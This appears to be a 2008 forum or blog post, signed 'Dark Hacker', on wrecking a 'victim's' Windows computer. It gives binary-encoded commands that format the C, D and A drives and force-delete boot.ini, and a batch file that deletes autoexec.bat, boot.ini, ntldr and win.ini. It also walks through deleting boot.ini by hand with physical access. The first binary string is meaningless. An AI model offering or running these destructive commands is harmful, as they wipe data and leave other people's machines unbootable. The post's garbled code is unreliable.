How To Kill A Computer

Code:

01001011000111110010010101010101010000011111100000

If that doesn't work, try this:

Code:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000

To Format a D drive:

Code:

01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000

To Format an A drive:

Code:

01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000

Deleting The Boot.ini

Code:

01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

Deleting Boot.ini with a BAT file

Code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

If you have physical access

Finally, if you have physical access to your victim's computer, you can delete the Boot.ini yourself manually. First, you have to enable viewing of Hidden/Operating System Files.

In Vista:
Open any folder, On the top left, click Organize>Folder &Search Option>Click on the view tab, then choose to show Hidden Files and uncheck the Hide protected operating system files box.

In windows XP:
Open any folder, click on the tools menu, then Folder options, click on the view tab, then choose to show Hidden Files and uncheck the Hide protected operating system files box.

After you have done this, go to my computer, then the main hard drive (most probably C) and look for the file boot.ini - Delete it permanently and you won't be able to boot windows again.

And of course, people who know can fix this.
Written by Dark Hacker!!!
Reply With Quote

Wednesday, November 26, 2008

0 Comments: